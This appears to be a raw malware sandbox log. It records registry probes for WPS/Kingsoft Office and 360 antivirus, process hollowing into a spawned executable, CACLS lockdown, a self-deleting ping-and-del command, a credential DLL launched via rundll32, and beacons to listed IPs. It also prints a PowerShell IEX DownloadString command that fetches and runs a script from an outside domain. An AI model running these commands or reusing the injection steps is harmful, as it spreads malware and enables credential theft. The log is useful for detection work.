 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x0000009c
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360安全卫士
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360安全卫士
2 0

RegOpenKeyExW

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x0000009c
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x0002001f
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x02000000
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0
cmdline ping 127.0.0.1
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
wmi SELECT * FROM Win32_Processor
host 109.206.241.33
host 195.123.226.82
host 79.137.192.3
host 85.217.144.143
host 85.217.144.228
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2644
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Time & API Arguments Status Return Repeated

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

 module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

 module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2644
process_handle: 0x00000080
1 1 0
Time & API Arguments Status Return Repeated

send

 buffer: sod˜ÆÞæp°—#{úÚ(â'±Ïø«±ã|xéš/5 ÀÀÀ À 28.ÿsungeomatics.com  
socket: 1260
sent: 120
1 120 0

send

 buffer: uàdÅëpì°â(¢ô»Ýûó΀<&ù©ÈÁJûÛ¢>Uöçì¡@xÊog¢€o؈ÄÜ¿ÂYÖ-NÎ6 …b âñþ“/+þ¿Œì@c»ýC…©Z '¥ûfŒZH±¸ÍC¥Ž;ܦs_Gm<2OÁ®HAX”Õ¥qÅÛøÿ½¡eø&0V)ËÅs®[±6ð¢c5Ÿ©Sƒdåã@˜ýۄÁš},ÅË£LZ@Yñì-™ôLÁ…š>½<_›Aw°Õä-Âii݄>Þz@ÆÀÒ®Nÿ]¶ý ÏZ²)FÈÅÈñ9’´_¼‡*¹|K,Œ*^7֔L ¼" 0ú!¸ª)ÂVñ¢¨ëpñfý0} XRӏU±«ËÓŒA³–˜E扣×Þ
socket: 1260
sent: 326
1 326 0

send

 buffer: póÝþI+èº$ÿîc¯4ñï¡<1* ×h)z7ÊC¨µŸOîa-¾µBñ¶.v.;ϞæٗÂÿV ˆm™ÍŒÝø°öùԉw³ê›™käËý¥7&ÑVÁUô£ɋ ž<}œ½á5M»hç_íIx•'
socket: 1260
sent: 117
1 117 0

send

 buffer: GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM HTTP/1.1 Host: 195.123.226.82 Connection: Keep-Alive
socket: 1684
sent: 128
1 128 0
Process injection Process 2524 called NtSetContextThread to modify thread in remote process 2644
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2644
1 0 0
Process injection Process 1452 resumed a thread in remote process 560
Process injection Process 2524 resumed a thread in remote process 2644
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000a88
suspend_count: 1
process_identifier: 560
1 0 0

NtResumeThread

 thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2644
1 0 0
cmdline CACLS "..\73456c80a6" /P "test22:N"
cmdline CACLS "jbruyer.exe" /P "test22:R" /E
cmdline CACLS "..\73456c80a6" /P "test22:R" /E
cmdline CACLS "jbruyer.exe" /P "test22:N"
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Time & API Arguments Status Return Repeated

WNetGetProviderNameW

 net_type: 0x00250000
1222 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2792
thread_handle: 0x00000320
process_identifier: 2788
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000328
1 1 0

CreateProcessInternalW

 thread_identifier: 1528
thread_handle: 0x0000000000000a88
process_identifier: 560
current_directory: C:\Windows\system32
filepath: C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe
track: 1
command_line: "C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe" -downpower -msgwndname=wpssetup_message_1A705C3 -curinstalltemppath=C:\Users\test22\AppData\Local\Temp\wps\~1a70025\
filepath_r: C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000420
1 1 0

NtResumeThread

 thread_handle: 0x0000000000000a88
suspend_count: 1
process_identifier: 560
1 0 0

CreateProcessInternalW

 thread_identifier: 2988
thread_handle: 0x0000008c
process_identifier: 2984
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 3028
thread_handle: 0x00000088
process_identifier: 3024
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "jbruyer.exe" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 908
thread_handle: 0x0000008c
process_identifier: 1964
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "jbruyer.exe" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2108
thread_handle: 0x0000008c
process_identifier: 2116
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

 thread_identifier: 192
thread_handle: 0x00000094
process_identifier: 2068
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\73456c80a6" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2228
thread_handle: 0x0000008c
process_identifier: 2232
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\73456c80a6" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

NtResumeThread

 thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 3024
1 0 0

NtResumeThread

 thread_handle: 0x0000009c
suspend_count: 1
process_identifier: 1964
1 0 0

NtResumeThread

 thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 2068
1 0 0

NtResumeThread

 thread_handle: 0x00000098
suspend_count: 1
process_identifier: 2232
1 0 0

CreateProcessInternalW

 thread_identifier: 2636
thread_handle: 0x0000007c
process_identifier: 2644
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\1000002051\toolspub1.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000002051\toolspub1.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000002051\toolspub1.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

 thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 2644
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2644
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2644
process_handle: 0x00000080
1 1 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2644
1 0 0

NtResumeThread

 thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2644
1 0 0

CreateProcessInternalW

 thread_identifier: 2724
thread_handle: 0x000001ec
process_identifier: 2720
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\sysnative\cmd.exe
track: 1
command_line: "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
filepath_r: C:\Windows\sysnative\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000001f4
1 1 0

CreateProcessInternalW

 thread_identifier: 3056
thread_handle: 0x00000548
process_identifier: 2860
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000550
1 1 0

CreateProcessInternalW

 thread_identifier: 3000
thread_handle: 0x0000000000000060
process_identifier: 2956
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

NtResumeThread

 thread_handle: 0x0000000000000288
suspend_count: 1
process_identifier: 2956
1 0 0

NtResumeThread

 thread_handle: 0x00000000000002dc
suspend_count: 1
process_identifier: 2956
1 0 0

NtResumeThread

 thread_handle: 0x000000000000036c
suspend_count: 1
process_identifier: 2956
1 0 0

NtResumeThread

 thread_handle: 0x00000000000004d0
suspend_count: 1
process_identifier: 2956
1 0 0

NtResumeThread

 thread_handle: 0x00000000000006ec
suspend_count: 1
process_identifier: 2956
1 0 0

CreateProcessInternalW

 thread_identifier: 1400
thread_handle: 0x00000084
process_identifier: 2136
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 127.0.0.1
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

 thread_handle: 0x000000d0
suspend_count: 1
process_identifier: 2136
1 0 0

CreateProcessInternalW

 thread_identifier: 2380
thread_handle: 0x0000001c
process_identifier: 2452
current_directory:
filepath:
track: 1
command_line: .\Install.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

 thread_identifier: 2616
thread_handle: 0x0000001c
process_identifier: 2624
current_directory:
filepath:
track: 1
command_line: .\Install.exe /S /site_id "385104"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

 thread_identifier: 1108
thread_handle: 0x000000dc
process_identifier: 1668
current_directory:
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a967e0f403b652\cred64.dll, Main
filepath_r: C:\Windows\system32\rundll32.exe
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000000d8
1 1 0

NtResumeThread

 thread_handle: 0x0000000000000108
suspend_count: 1
process_identifier: 1668
1 0 0

CreateProcessInternalW

 thread_identifier: 2188
thread_handle: 0x0000001c
process_identifier: 108
current_directory:
filepath:
track: 1
command_line: .\Install.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

 thread_identifier: 1544
thread_handle: 0x0000001c
process_identifier: 1140
current_directory:
filepath:
track: 1
command_line: .\Install.exe /IjXdidOBxH "385118" /S
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

 thread_identifier: 2164
thread_handle: 0x000001e0
process_identifier: 2368
current_directory:
filepath: C:\Windows\System32\certreq.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\certreq.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000019c
